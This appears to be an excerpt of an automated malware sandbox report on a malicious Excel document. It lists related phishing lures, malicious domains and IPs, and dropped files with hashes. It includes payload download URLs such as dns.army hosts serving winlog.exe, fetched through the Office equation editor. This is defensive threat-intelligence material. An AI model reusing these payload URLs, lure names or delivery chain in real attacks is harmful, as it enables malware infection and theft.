                                                                                                                                                                INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreensndykeghesnpw.dns.army/aledoc/winlog.exe
                                                                                                                                                                RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreensndykeghesnpw.dns.army/aledoc/winlog.exe
                                                                                                                                                                PE20-RQ- 1638.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                SHEXD201990876_SHIPPING_DOCUMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                2218003603 92390-00.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedst.dns.navy/aledoc/winlog.exe
                                                                                                                                                                inquiry10204168.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                RFQ 41680.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                RF-E68-STD-2020-106.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykegheedah.dns.army/aledoc/winlog.exe
                                                                                                                                                                SCAN DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • bvcxzlkjhgfdsapoiuytrewqwertyuiopasdfghj.ydns.eu/invoice.doc
                                                                                                                                                                54.67.57.56MV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/dytF30rxT6o
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/GNEu30rxT59
                                                                                                                                                                New_Message00934.htmGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/J9A830rbc9g
                                                                                                                                                                http://ht.ly/Q3Px30qXOOAGet hashmaliciousBrowse
                                                                                                                                                                • ht.ly/Q3Px30qXOOA
                                                                                                                                                                http://ow.ly/Rrh750jwUFvGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/Rrh750jwUFv
                                                                                                                                                                C72781002.pdfGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/pnzA30gASLt
                                                                                                                                                                http://ow.ly/F2zF30gk7FA?f$9fk45ft987hGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/F2zF30gk7FA?f$9fk45ft987h
                                                                                                                                                                NEW QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/5LIK30cNgLL
                                                                                                                                                                DHL_TRACKING_DETAILS_-_Copy.pdfGet hashmaliciousBrowse
                                                                                                                                                                • ow.ly/YFZ6w

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                algreenstdykeghestqw.dns.armyquotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.140.251.164
                                                                                                                                                                ow.lyMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                New_Message00934.htmGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                https://u17588438.ct.sendgrid.net/ls/click?upn=h-2Bj1pe3h4Ysprj-2F8RRf9ChxAthv8oUCYMnydAOiqdZUW-2BWPjSW0-2FEf5GesIstZyF0TVG_lbRSzjTjAOmWKCI6GhhOife1Jj1xtmqeANf3i3jW3opERdKAfB6RW1d9S3-2BY3uAZ73G93x4NRv3SGU9GC4XSs1eCeVJJbjnXgiEyfnLUrO5zxeR-2BpWFMutEFdboHQGx95igAqkR70Vu4Hiwd9NcrDdrJs-2BOivQ93TFqP-2BT4HPMkXW0NLxBKQVPvAgnXNChoww1TXGQN2qsuqwn8GkbQaq3PqNM7QYH3v-2Fv5T56RWSqXIWExu7REiKCcAp9f6Du8yGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                https://u18021447.ct.sendgrid.net/ls/click?upn=4-2B97j-2BtYQoCI2fDYEybJE8VXu-2FoT5KUlTEBIP-2FZpwja1LaUJU-2BvsibdvO6vqoNKGEtLN_tkuwbiJYWhKaepE-2BM1TZDajlOQqjy023dIArdFfY4Q7aInX1fHyzMaSNgDpN4RXFFT28Nvm4lTgRP2Lo2wigkcpLbULWR3rg-2FE60qFalXBd1XauXGfqffZ3Vso2GpH8M2RIy-2BLstJ0DTX5Ex-2FSV3rlGx9ZgW98jLaWYfY9EKxp-2Bb-2FdkzvrNyt500LWgC9ORMQ0r6YfW8Y79Zk2VNJnudzlxb1CJo-2FW7Zs6eo8A-2FWgzs-3DGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                http://ow.ly/nDiV30mD63nGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.132.164
                                                                                                                                                                http://ow.ly/Rrh750jwUFvGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                GTEDS.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                GTEDS.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.130.144
                                                                                                                                                                Marine Engine Spare Parts Order_first.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                CCS Projects.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.132.164
                                                                                                                                                                http://ow.ly/8rYF30jYWv5Get hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                Locked.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.131.91
                                                                                                                                                                http://ow.ly/avIT30jzSjvGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                9a835a425c8321c22d5a751078cb5f020abaaaafe7cf80fee68237d0811fcae.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.183.130.144
                                                                                                                                                                http://ow.ly/4mh330j3SCOGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                ACHIEVE-1 CONTRACT.pdfGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.comG6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                                                                                                                • 18.195.132.44

                                                                                                                                                                ASN

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                AMAZON-02USMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                                                                                                                • 104.192.141.1
                                                                                                                                                                R4VugGhHOo.exeGet hashmaliciousBrowse
                                                                                                                                                                • 18.197.52.125
                                                                                                                                                                RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.58.78.16
                                                                                                                                                                ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                                                                                                • 13.57.130.120
                                                                                                                                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 35.158.240.78
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.62.204
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.120.65
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 54.67.57.56
                                                                                                                                                                FortPlayerInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                                • 13.224.94.78
                                                                                                                                                                RGB HeroInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                                • 99.86.159.18
                                                                                                                                                                Buff-Installer.exeGet hashmaliciousBrowse
                                                                                                                                                                • 13.224.195.128
                                                                                                                                                                PO_210222.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.58.78.16
                                                                                                                                                                Order83930.exeGet hashmaliciousBrowse
                                                                                                                                                                • 3.131.252.17
                                                                                                                                                                rieuro.dllGet hashmaliciousBrowse
                                                                                                                                                                • 143.204.4.74
                                                                                                                                                                AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 52.213.114.86
                                                                                                                                                                document-1915351743.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 143.204.4.74
                                                                                                                                                                X1(1).xlsmGet hashmaliciousBrowse
                                                                                                                                                                • 99.86.159.123
                                                                                                                                                                wsXYadCYsE.pkgGet hashmaliciousBrowse
                                                                                                                                                                • 52.216.242.12
                                                                                                                                                                ASDETUKhttpwwwheficedcomGBProforma invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                DnHeI10lQ6.exeGet hashmaliciousBrowse
                                                                                                                                                                • 191.101.50.30
                                                                                                                                                                Mortgage Description.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.221.66.18
                                                                                                                                                                35HFM7BNtD.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                QwLijaR9ex.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                order_list_fe99087.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                516783.PO.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 45.150.67.133
                                                                                                                                                                RFQ# 02012021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                QRN-CLJC-06112020149.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ#212021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ #28012021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                Req for Quote.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.31.82
                                                                                                                                                                JANUARY QUOTATION FOR PRODUCT ORDER 02983H G FOR Goldolphin INDUSTRIES LTD PACKING LIST FOR 60MM.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.221.66.154
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                ACH Remittance Details.xlsGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.142.116
                                                                                                                                                                BFSV-1F(N)_1B-8B_ANSI.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.138.49.96
                                                                                                                                                                ts1593782194000000.exeGet hashmaliciousBrowse
                                                                                                                                                                • 45.138.49.96
                                                                                                                                                                https://mysp.ac/WJKWebxcAX/../4lj3C#fCfAXmrBDFsvHupFQHQULbmkQvYGet hashmaliciousBrowse
                                                                                                                                                                • 181.214.121.98
                                                                                                                                                                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.120
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.133.108.6
                                                                                                                                                                SKBMT_ 5870Z904_ Image.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.149
                                                                                                                                                                FedEx Shipment 427781339903.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.151.123.132
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                Our New Order Feb 23 2021 at 2.70_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                quote.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                Our New Order Feb 22 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.128
                                                                                                                                                                quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.140.251.164
                                                                                                                                                                notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.147.184.10
                                                                                                                                                                22-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.118
                                                                                                                                                                Shipping_Document.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.119
                                                                                                                                                                Remittance copy.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                CI + PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.117

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dlllpdKSOB78u.exeGet hashmaliciousBrowse
                                                                                                                                                                  jTmBvrBw7V.exeGet hashmaliciousBrowse
                                                                                                                                                                    523JHfbGM1.exeGet hashmaliciousBrowse
                                                                                                                                                                      TAk8jeG5ob.exeGet hashmaliciousBrowse
                                                                                                                                                                        PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                                                                                                          ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                            Orderoffer.exeGet hashmaliciousBrowse
                                                                                                                                                                              Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                INV_PR2201.docmGet hashmaliciousBrowse
                                                                                                                                                                                  CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                                                                                                                    Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                                                                                                                                                                          quote.exeGet hashmaliciousBrowse
                                                                                                                                                                                            Order83930.exeGet hashmaliciousBrowse
                                                                                                                                                                                              Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                                                                                                                                                                Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  GPP.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    OrderSuppliesQuote0817916.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      ACCOUNT DETAILS.exeGet hashmaliciousBrowse

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]
                                                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):217624
                                                                                                                                                                                                        Entropy (8bit):7.895818449493941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
                                                                                                                                                                                                        MD5:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        SHA1:32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
                                                                                                                                                                                                        SHA-256:38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
                                                                                                                                                                                                        SHA-512:B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        IE Cache URL:http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@.......................................@.................................D...........|............................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...XU...........~..............@....ndata...................................rsrc...|...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CFA2F95.jpeg
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48770
                                                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D657FE6.png
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111378
                                                                                                                                                                                                        Entropy (8bit):7.963743447431302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                                                                        MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                                                                        SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                                                                        SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                                                                        SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC9322AF.jpeg
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48770
                                                                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6617CE4.png
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111378
                                                                                                                                                                                                        Entropy (8bit):7.963743447431302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                                                                        MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                                                                        SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                                                                        SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                                                                        SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emf
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):653280
                                                                                                                                                                                                        Entropy (8bit):2.8986377906498118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:634UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:04UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                                                        MD5:A49BEB715E475DD3C32F25ED71346D54
                                                                                                                                                                                                        SHA1:1A455F9E7C1D969A119EE77FEEA4904D62C217BE
                                                                                                                                                                                                        SHA-256:58965E7DDEF9329510DD2E62A3DE60DEB484C897A0152EDF311E6FA01347D599
                                                                                                                                                                                                        SHA-512:8AB6D1FCF71C415245F3608C071A05063D3F7FC87BC378D98DCE9F6EA71ECD334FE60BC77BA358F3E1913B90F70D52E8973B9D90934C07316134285A0F1A20E7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................P........N.WP...H...........4....N.WP...H... ....y.RH...P... ............z.R............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...H...|....2.Q.................{.Q............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsgE449.tmp
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):191404
                                                                                                                                                                                                        Entropy (8bit):7.878606044995474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:2ojw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAWXNt:2ogstrYBJ9Dy3SFSxuPmWrt
                                                                                                                                                                                                        MD5:4FECDED6A29355A90A3D3B3AABBB16E4
                                                                                                                                                                                                        SHA1:F0F16D89E8D1DD35F088CB49298DEA74A3FFF53B
                                                                                                                                                                                                        SHA-256:29680AD46B1D8A090A403798300D02897B547CF3F87FE44ADA08D95C7D34406B
